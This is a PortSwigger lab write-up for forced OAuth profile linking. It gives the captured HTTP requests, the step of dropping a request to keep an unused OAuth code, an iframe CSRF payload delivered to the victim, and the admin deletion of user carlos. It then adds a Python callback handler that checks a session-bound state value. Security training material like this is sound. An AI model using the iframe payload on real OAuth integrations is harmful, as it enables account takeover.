PortSwigger: Forced OAuth profile linking
Solution
Log in to the website as user: wiener
POST /login HTTP/2
Host: 0a5200f404b3e88e83f26adf00200055.web-security-academy.net
Cookie: session=9k1xxXHp8RWJn0r9Q6GHl6bya9GglfMO
Content-Length: 68
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Origin: https://0a5200f404b3e88e83f26adf00200055.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a5200f404b3e88e83f26adf00200055.web-security-academy.net/login
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

csrf=ivZBjROT9XNMcdI64sYy05XOrzW4YETJ&username=wiener&password=peter
---
GET /my-account?id=wiener HTTP/2
Host: 0a5200f404b3e88e83f26adf00200055.web-security-academy.net
Cookie: session=TMh6GXv7KigXw0AybIysHivMeDs5HyDm
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Referer: https://0a5200f404b3e88e83f26adf00200055.web-security-academy.net/login
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
---
GET /oauth-linking?code=0CA6BJXfL04eVUhT8yCCZjq7PvFIEVr9A1gYlRL7IUa HTTP/2
Host: 0a5200f404b3e88e83f26adf00200055.web-security-academy.net
Cookie: session=TMh6GXv7KigXw0AybIysHivMeDs5HyDm
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Referer: https://oauth-0a07007404f1e82a836268e80221007c.oauth-server.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
---
GET /my-account HTTP/2
Host: 0a5200f404b3e88e83f26adf00200055.web-security-academy.net
Cookie: session=TMh6GXv7KigXw0AybIysHivMeDs5HyDm
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a5200f404b3e88e83f26adf00200055.web-security-academy.net/oauth-linking?code=0CA6BJXfL04eVUhT8yCCZjq7PvFIEVr9A1gYlRL7IUa
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Request a second code
Send / drop the request and get an active code: RV8vQ0rG7bArAQB1bAiAtvRoocPvv7u68P-hGYMj3p_
---
GET /oauth-login?code=RV8vQ0rG7bArAQB1bAiAtvRoocPvv7u68P-hGYMj3p_ HTTP/2
Host: 0a5200f404b3e88e83f26adf00200055.web-security-academy.net
Cookie: session=aG7xcWh3w22LtqLwK7rdCnPYeKsXHNkg
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Referer: https://0a5200f404b3e88e83f26adf00200055.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Open "Exploit server" and create payload
Payload: <iframe src="https://0a5200f404b3e88e83f26adf00200055.web-security-academy.net/oauth-linking?code=fhTtIE8-iKtSEEtJa8-ZhzdYP2tNL0arZzEfrkgUcRw"></iframe>
Click "Store" --> "Deliver exploit to victim"
Delete user: carlos
GET /admin/delete?username=carlos HTTP/2
Host: 0a5200f404b3e88e83f26adf00200055.web-security-academy.net
Cookie: session=JPpvnTWXu4AOofHVQRbNwdT7VKGmTbBq
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a5200f404b3e88e83f26adf00200055.web-security-academy.net/admin
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Solved
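
The /oauth-linking request above carries only a code parameter and no state value tied to the session, which is what lets the iframe payload complete the link inside the victim's session. Added example (not part of the original writeup or the lab's code): a callback handler that refuses to link unless a one-time state bound to the session comes back. SESSIONS, LINKS, begin_linking, handle_linking_callback and the exchange_code callable are hypothetical names, and the sample data is constructed.

```python
import hmac
import secrets
from urllib.parse import urlsplit, parse_qs

# Hypothetical in-memory stores (assumptions, not the lab's implementation).
SESSIONS = {}  # session id -> {"user": ..., "oauth_state": ...}
LINKS = {}     # local user -> linked social profile


def begin_linking(session_id):
    """Start the flow: mint a one-time state value bound to this session."""
    state = secrets.token_urlsafe(32)
    SESSIONS[session_id]["oauth_state"] = state
    return state  # sent to the provider as &state=... on the authorization URL


def handle_linking_callback(session_id, request_target, exchange_code):
    """Handle GET /oauth-linking?code=...&state=...; link only if state matches."""
    session = SESSIONS.get(session_id)
    if session is None:
        return 401, "not logged in"
    query = parse_qs(urlsplit(request_target).query)
    code = query.get("code", [""])[0]
    returned = query.get("state", [""])[0]
    expected = session.pop("oauth_state", None)  # single use, even on failure
    if not expected or not returned or not hmac.compare_digest(
            expected.encode(), returned.encode()):
        return 403, "state missing or mismatched; link refused"
    if not code:
        return 400, "missing code"
    # exchange_code stands in for the token exchange plus userinfo lookup.
    LINKS[session["user"]] = exchange_code(code)
    return 200, "linked"


def demo():
    # Constructed sample data: one victim session and two provider codes.
    SESSIONS["victim-session"] = {"user": "victim"}
    profiles = {"ATTACKER_CODE": "attacker-social-profile",
                "VICTIM_CODE": "victim-social-profile"}
    # Cross-site request carrying someone else's code and no state: refused.
    forged = handle_linking_callback(
        "victim-session", "/oauth-linking?code=ATTACKER_CODE", profiles.get)
    # Flow the victim started themselves: state round-trips and the link succeeds.
    state = begin_linking("victim-session")
    target = f"/oauth-linking?code=VICTIM_CODE&state={state}"
    genuine = handle_linking_callback("victim-session", target, profiles.get)
    replay = handle_linking_callback("victim-session", target, profiles.get)
    return forged, genuine, replay, dict(LINKS)
```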